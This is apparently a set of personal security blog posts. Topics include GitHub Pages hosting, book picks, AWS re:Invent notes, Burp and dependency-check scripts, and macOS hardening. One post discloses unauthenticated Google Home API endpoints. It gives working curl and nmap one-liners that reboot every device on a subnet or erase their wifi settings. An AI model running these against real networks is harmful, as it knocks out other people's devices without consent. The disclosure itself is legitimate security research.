Category: Uncategorized

I have developed a bad habit of picking up vanity domain names and not really doing much with them. Last month at AWS Re:Invent I picked up ServerlessSecurity.org and really wanted to do something with it but didn’t feel like maintaining, or paying for, a VPS so after doing some looking around I found that is was possible to point a custom domain to Github pages.

The documentation they provide is a little lacking, so I figured I would put together a small how to for anyone who wants to do this for themselves.

Configure Your Github Repo

• Create a new repo for your website.
• Go To Settings Page
• Find The Github Pages Area

• Select Your Theme:

• Decide What Branch You Want To Host The Page In:

• Enter Your Domain Name:

• Enforce HTTPS

• Finally, Edit Your Index.md file With Your Content.

Configure DNS

DNS configuration is pretty straightforward. You want to add the following IP addresses to your custom resource records.

185.199.108.153
185.199.109.153
185.199.110.153
185.199.111.153

You Now Have A Website

After you configure your repo and update you DNS settings within 15 minutes or so your website should be live.

Conclusion

This is a really such simple method of hosting a website I parked the rest of my vanity websites:

• HandsOnHacking.org
• JiraMasters.com
• CarefulGRC.com
• Fedramp.run

I hope this is helpful for other people looking to host a website quickly.

Here is a list of my favorite security books from 2018 if you are looking for that last minute gift or have some extra time around the holidays to catch up on some reading.  

The GCHQ Puzzle Book 2

I just got The GCHQ Puzzle Book 2, and like the original, it has quickly become the book that I always have in my bag.  It is full of amazingly challenging and thought-provoking problems.  It is easily the best gift you can give the security geek in your life this year. 

Cracking Codes with Python

Cracking Codes with Python: An Introduction to Building and Breaking Ciphers was a great (re)introduction to python development and cryptography concepts. While fairly basic in some places this book will be one I give out to people for years to come. 

Hands-On Security in DevOps

Hands-On Security in DevOps: Ensure continuous security, deployment, and delivery is a great book that covers at a high level what goes into succesfull starting and running a security program.  

Agile Application Security

Agile Application Security: Enabling Security in a Continuous Delivery Pipeline is a book that clearly explains how to make security work in an agile development environment.  This book will be a must-read for security professionals for years to come. 

Dawn of the Code War

Dawn of the Code War: America’s Battle Against Russia, China, and the Rising is a book by John Carlin that shows both how far the US Federal government has come and how far behind the rest of the world they are.  

I spent this last week in Las Vegas attending AWS Re:Invent. 

This event is mind-numbingly massive with classes happening at 4 or 5 hotels all over the strip. I personally spent over an hour every day on their (nice but extremely slow) shuttle buses between the MGM Grand, Aria and the Sands Expo Center.

It would be impossible to see everything at this conference so throughout the week I compiled a list of services I wanted to investigate more, and I thought I would share them below.

Security

• Security Hub
• ControlTower
• AWS Well-Architected Framework (PDF)
• Cloudwatch Logs Insights
• KMS Custom Key Stores

Serverless

• Firecracker

Cloudless(?)

• Outposts

ML/AI

• Machine Learning Training From AWS
• AWS ML Marketplace
• AWS Inferentia

Devops

• Code Deploy Blue/Green
• Amplify

Grab Bag

• AWS ARM Processors 
• “Managed Blockchain”
• RobotOS
• RoboMaker
• API Gateway Websockets
• DeepRacer

Closing Thoughts

I had a great time this year and learned a ton. I am looking forward to playing with Security Hub and to finish reading the AWS Well-Architected Framework PDF soon.

I am disappointed that DeepRacer seems to be AWS just taking the DonkeyCar model and close sourcing it without mentioning the original project, even after they have had DonekyCars at the last 2 re:invents.

Lastly, I interested to see if security is deemphasized next year with the announcement of a security-focused conference called re:inforce.

I have started using the Burp Suite 2.0 beta full time recently, and some of the new features I knew I wanted to explore more was the API and the CI Integration.  

This project is still in its *very* early stages, but if you want to play with what I have been working on below are directions to get started. 

What You Need

• Burp Suite Professional 2.0
  • API Running on 127.0.0.1:1337 
• Burp Generic CI Driver
• Github Access Token 
• BurpIssues.sh Script

Running The Script

Download BurpIssues.sh to the folder where you have burp-ci-driver-v1.0.5beta.jar saved.

Edit the following fields in the script:

Github_Auth_Token="YourToken"
Github_Repo_URL=”YourRepo"
min_severity_burp="low"  # Can Be Info|Low|Medium|High

Once that is done, running the script is as simple as: 

./BurpIssues.sh domainyouhavepermissiontoscan.tld

Reminder:  This is a full burp scan and can take anywhere from 10 mintues to many hours to complete depending on how big the site is. 

What’s Next:

• Move From Gist To A Github Repo.
• Add More Fields The Issues
  • Identify Duplicate Issues
• Kenna Integration
• JIRA / Service Now Tickets
• Customizable Scanning and Crawling Profiles
• Docker Container / VPS Build Script

Closing Thoughts

While I am just getting started with the CI tool, I was impressed that this only took 20 lines of shell code.   I plan on building out a lot more functionality and error checking over the next few months.

If you have any questions, suggestions or improvements, let me know on twitter. 

TL;DR: An undocumented API in Google home devices is easily exploitable.
This command will reboot any on your local network:
nmap --open -p 8008 192.168.1.0/24 | awk '/is up/ {print up}; {gsub (/\(|\)/,""); up = $NF}' | xargs -I % curl -Lv -H Content-Type:application/json --data-raw '{"params":"now"}' http://%:8008/setup/reboot

Introduction

I have always been a fan of Google Products, so when they announced the Google Home Hub, I ordered one.

Once I got the Hub on my network I scanned it and it returned the following:

Nmap scan report for hub
Host is up (0.046s latency).
Not shown: 995 closed ports
PORT STATE SERVICE
8008/tcp open http
8009/tcp open ajp13
8443/tcp open https-alt
9000/tcp open cslistener
10001/tcp open scp-config

I was surprised to see so many ports open so I started to do some research and found that these devicies have an undocumented (and amazingly unsecured) API

After spending 15 or 20 minutes looking I found that you can reboot the hub with this unauthenticated curl command:  

curl -Lv -H Content-Type:application/json --data-raw '{"params":"now"}' http://hub:8008/setup/reboot

I tweeted what happens when you run that command:

After I was able to get the Hub to reboot I was hooked and gave up a few hours of sleep to do some research and ended up finding a bunch of “good” information (see reading list at bottom). 

At the end of the night, I was extremely disappointed with the security of these devices especially coming from Google who I trust with so much of my data and is the driving force behind BeyondCorp. 

Technical Deep Dive

I am going to dive directly into sharing some of the commands I have found and the output and will end by showing how a bad actor could use this API. 

System Information

Pull Basic SSDP Information:

$ curl http://hub:8008/ssdp/device-desc.xml
<?xml version="1.0"?>
<root xmlns="urn:schemas-upnp-org:device-1-0">
  <specVersion>
    <major>1</major>
    <minor>0</minor>
  </specVersion>
  <URLBase>http://hub:8008</URLBase>
  <device>
    <deviceType>urn:dial-multiscreen-org:device:dial:1</deviceType>
    <friendlyName>Kitchen Display</friendlyName>
    <manufacturer>Google Inc.</manufacturer>
    <modelName>Google Home Hub</modelName>
    <UDN>uuid:11111111-adac-2b60-2102-11111aa111a</UDN>
    <iconList>
      <icon>
        <mimetype>image/png</mimetype>
        <width>98</width>
        <height>55</height>
        <depth>32</depth>
        <url>/setup/icon.png</url>
      </icon>
    </iconList>
    <serviceList>
      <service>
        <serviceType>urn:dial-multiscreen-org:service:dial:1</serviceType>
        <serviceId>urn:dial-multiscreen-org:serviceId:dial</serviceId>
        <controlURL>/ssdp/notfound</controlURL>
        <eventSubURL>/ssdp/notfound</eventSubURL>
        <SCPDURL>/ssdp/notfound</SCPDURL>
      </service>
    </serviceList>
  </device>
</root>

Pull The Eureka Infomation:

$ curl -s http://hub:8008/setup/eureka_info | jq
{
  "bssid": "cc:be:59:8c:11:8b",
  "build_version": "136769",
  "cast_build_revision": "1.35.136769",
  "closed_caption": {},
  "connected": true,
  "ethernet_connected": false,
  "has_update": false,
  "hotspot_bssid": "FA:8F:CA:9C:AA:11",
  "ip_address": "192.168.1.1",
  "locale": "en-US",
  "location": {
    "country_code": "US",
    "latitude": 255,
    "longitude": 255
  },
  "mac_address": "11:A1:1A:11:AA:11",
  "name": "Hub Display",
  "noise_level": -94,
  "opencast_pin_code": "1111",
  "opt_in": {
    "crash": true,
    "opencast": true,
    "stats": true
  },
  "public_key": "Removed",
  "release_track": "stable-channel",
  "setup_state": 60,
  "setup_stats": {
    "historically_succeeded": true,
    "num_check_connectivity": 0,
    "num_connect_wifi": 0,
    "num_connected_wifi_not_saved": 0,
    "num_initial_eureka_info": 0,
    "num_obtain_ip": 0
  },
  "signal_level": -60,
  "ssdp_udn": "11111111-adac-2b60-2102-11111aa111a",
  "ssid": "SSID",
  "time_format": 2,
  "timezone": "America/Chicago",
  "tos_accepted": true,
  "uma_client_id": "1111a111-8404-437a-87f4-1a1111111a1a",
  "uptime": 25244.52,
  "version": 9,
  "wpa_configured": true,
  "wpa_id": 0,
  "wpa_state": 10
}

Run A Simple Speedtest:

$ curl -Lv -H Content-Type:application/json --data-raw '{ "url": "https://storage.googleapis.com/reliability-speedtest/random.txt" }' http://hub:8008/setup/test_internet_download_speed

Rebooting

Reboot The System:

$ curl -Lv -H Content-Type:application/json --data-raw '{"params":"now"}' http://hub:8008/setup/reboot
*   Trying hub...
* TCP_NODELAY set
* Connected to hub (hub) port 8008 (#0)
> POST /setup/reboot HTTP/1.1
> Host: hub:8008
> User-Agent: curl/7.54.0
> Accept: */*
> Content-Type:application/json
> Content-Length: 16
>
* upload completely sent off: 16 out of 16 bytes
< HTTP/1.1 200 OK
< Access-Control-Allow-Headers:Content-Type
< Cache-Control:no-cache
< Content-Length:0
<
* Connection #0 to host hub left intact

Wireless

List Currently Configured Network:

$ curl http://hub:8008/setup/configured_networks
[{"ssid":"ssid","wpa_auth":7,"wpa_cipher":4,"wpa_id":0}]

Delete The Current Configured Network:

curl -Lv -H Content-Type:application/json --data-raw '{ "wpa_id": 0 }' http://hub:8008/setup/forget_wifi
*   Trying hub...
* TCP_NODELAY set
* Connected to hub (hub) port 8008 (#0)
> POST /setup/forget_wifi HTTP/1.1
> Host: hub:8008
> User-Agent: curl/7.54.0
> Accept: */*
> Content-Type:application/json
> Content-Length: 15
>
* upload completely sent off: 15 out of 15 bytes

This command basically makes the device unusable until you manually reconfigure it using the Google Home application:

Scan For Wireless Networks:

$ curl -X POST http://hub:8008/setup/scan_wifi

List Scan Results:

$ curl http://192.168.1.55:8008/setup/scan_results | jq
[
  {
    "ap_list": [
      {
        "bssid": "11:11:11:11:11:11",
        "frequency": 2462,
        "signal_level": -72
      }
    ],
    "bssid": "11:11:11:11:11:11",
    "signal_level": -72,
    "ssid": "SSID",
    "wpa_auth": 7,
    "wpa_cipher": 4
  },
  {
    "ap_list": [
      {
        "bssid": "11:11:11:11:11:11",
        "frequency": 2412,
        "signal_level": -81
      }
    ],
    "bssid": "11:11:11:11:11:11",
    "signal_level": -81,
    "ssid": "SSID2",
    "wpa_auth": 7,
    "wpa_cipher": 4
  },
  {
    "ap_list": [
      {
        "bssid": "11:11:11:11:11:11",
        "frequency": 2462,
        "signal_level": -77
      }
    ],
    "bssid": "11:11:11:11:11:11",
    "signal_level": -77,
    "ssid": "You_Get_The_Idea",
    "wpa_auth": 7,
    "wpa_cipher": 4
  },
]

Other Commands:

List Alarms and Timers:

$ curl http://hub:8008/setup/assistant/alarms

Disable All Notifcations:

$ curl -Lv -H Content-Type:application/json --data-raw '{ "notifications_enabled": true }' http://hub:8008/setup/assistant/notifications

Malicious Scripting 

Since none of these endpoints require authentication being malicious on a network with these present is trivial.  

This code will reboot all Google Home devices on the network:

nmap --open -p 8008 192.168.1.0/24 | awk '/is up/ {print up}; {gsub (/\(|\)/,""); up = $NF}' | xargs -I % curl -Lv -H Content-Type:application/json --data-raw '{"params":"now"}' http://%:8008/setup/reboot

This code will delete the wireless network from every Google Home on the network causing a manual reconfgiruation. 

nmap --open -p 8008 192.168.1.0/24 | awk '/is up/ {print up}; {gsub (/(|)/,""); up = $NF}' | xargs -I % curl -Lv -H Content-Type:application/json --data-raw '{ "wpa_id": 0 }' http://%:8008/setup/forget_wifi

Closing Thoughts

I am genuinely shocked by how poor the overall security of these devices are, even more so when you see that these endpoints have been known for years and relatively well documented. 

I usually would have worked directly with Google to report these issues if they had not previously been disclosed, but due to the sheer amount of prior work online and committed code in their own codebase, it is obvious they know.

Reading List:

• eureka_client.py
• Google Pull Request
• rithvikvibhu.github.io
• XDA
• FIQUTT 
• Chromecast Hacking

The new rest API in Burp 2.0 it is going to be amazing but it will allow things like this 9 line shell script I wrote this morning that will grab all public bounty sites from  @arkadiyt’s  bounty-targets-data repo and kick off a full scan.
https://gist.github.com/jgamblin/c22c0791af7572280d7fd569141650fe
I almost didn’t post this blog because I *think* this script is, in general, a bad idea and will likely lead to frivolous bounty reports and excessive traffic to these sites but if there is going to be an API people will abuse use it. 

I spend a lot of time working with MacOS and I have noticed that out of the box the operating system has some basic security settings that are not enabled by default so I have built a small script that automates configuring these.
It does the following:

• Requires Password Immediately After Sleep.
• Turns On Firewall.
  • Enables Stealth Mode.
• Disables Remote Login.
• Installs Needed System Updates.
  • Enables Automatic Updates
• Validates System Integrity Protection Is Enabled.
• Enables Full Disk Encryption.

MacOS-Security-Baseline is on GitHub here.  If you have any improvements or suggestions, please submit a GitHub issue or pull request.
I have also built three other tools in the past that compliments this tool:
MacOS-Config configures a new install of MacOS the way I like it.
MacOS-Maid cleans up MacOS by deleting unneeded files, wireless SSID’s and wiping free space.
Blackhat-MacOS-Config does most of what this script does and was the base for it but I wanted to present it to a more general audience.

Recently I have noticed that companies that use Google Suite have a fairly common misconfiguration that is making their internal groups public.  In some cases it is just the name of the groups but in some extreme cases the content of the posts are public.
Testing for this misconfiguration on your domain is as easy as looking at:
https://groups.google.com/a/%yourdomain.tld%/forum/#!forumsearch/
Google has (not really clear) instructions here on how to lock down your groups so they are not public. I have notified as many of the domains that I can that they have a misconfiguration but I am not able to notify everyone and Google has seemed to file this under It's not a bug, it's a feature.

I am a fan of Kali Linux and AWS so I love the fact that they have an official AMI.  While spinning up a Kali instance in AWS is fairly easy, I had a long flight today so I wrote a script that will spin up a Kali instance in about 60 seconds.
The script does the following:

• Builds a security group that only allows SSH access from your current public IP.
• Writes a new SSH Key in ~/Documents/instantkali/
• Creates a t2.medium EC2 instance.

Here is the output: 
 
Here is the code:
https://gist.github.com/jgamblin/fff0bd2187f070390248c14cc9148062

Recently while working on a project I wanted to run OWSAP Dependency Check against a Github Organization to find any out of date frameworks but I couldn’t find an easy way to do it so I built a tool. Right now it will check Node and Ruby applications and put all the out of date frameworks in a single CSV.
As an example I ran the tool against the Netflix Open Source Project and here are the results from today.  They have 35 out of date frameworks in all their public projects.
Here is what it looks like running:
 
Here is the code:

#!/bin/bash
username="[email protected]"
passwordtoken="get from here: https://github.com/settings/tokens"
org="$1"
repos=$(curl -u $username:$passwordtoken -s https://api.github.com/orgs/$org/repos?per_page=200 | jq -r .[].name | sort )
mkdir results
for repo in $repos
do
#Find Default Branch
defaultbranch=$(curl -u $username:$passwordtoken -s https://api.github.com/repos/$org/$repo | jq -r .default_branch)
node=$(curl -u $username:$passwordtoken -s -o /dev/null -I -w "%{http_code}" https://raw.githubusercontent.com/$org/$repo/$defaultbranch/package.json)
  if [ $node -eq "200" ]; then
    printf "Testing %s. \n" "$repo"
    curl -s -u $username:$passwordtoken https://raw.githubusercontent.com/$org/$repo/$defaultbranch/package.json > package.json
    dependency-check --scan ./package.json --project "$repo" --format CSV --out results/$repo.csv
    printf "\n\n"
  else
    ruby=$(curl -u $username:$passwordtoken -s -o /dev/null -I -w "%{http_code}" https://raw.githubusercontent.com/$org/$repo/$defaultbranch/Gemfile.lock)
    if [ $ruby -eq "200" ]; then
    printf "Testing %s. \n" "$repo"
    curl -s -u $username:$passwordtoken https://raw.githubusercontent.com/$org/$repo/$defaultbranch/Gemfile.lock > Gemfile.lock
    dependency-check --scan ./Gemfile.lock ---project "$repo" --format CSV --out results/$repo.csv
    printf "\n\n"
  fi
  printf "%s is not a Node or Ruby Project. Unable to run dependency-check. \n\n" "$repo"
  fi
done
#Consulidate The Report
 cat results/*.csv > results/temp.csv
 awk '!x[$0]++' results/temp.csv > results/temp2.csv
 cut -d',' -f1-4,6- results/temp2.csv > githubvulns.csv
 rm results/*.csv

Some Quick Notes:

• There was a bug that was just fixed that stopped me from releasing this earlier.
• I will try to expand this to scan more types of code in the future.
• Let me know on twitter if you have any questions.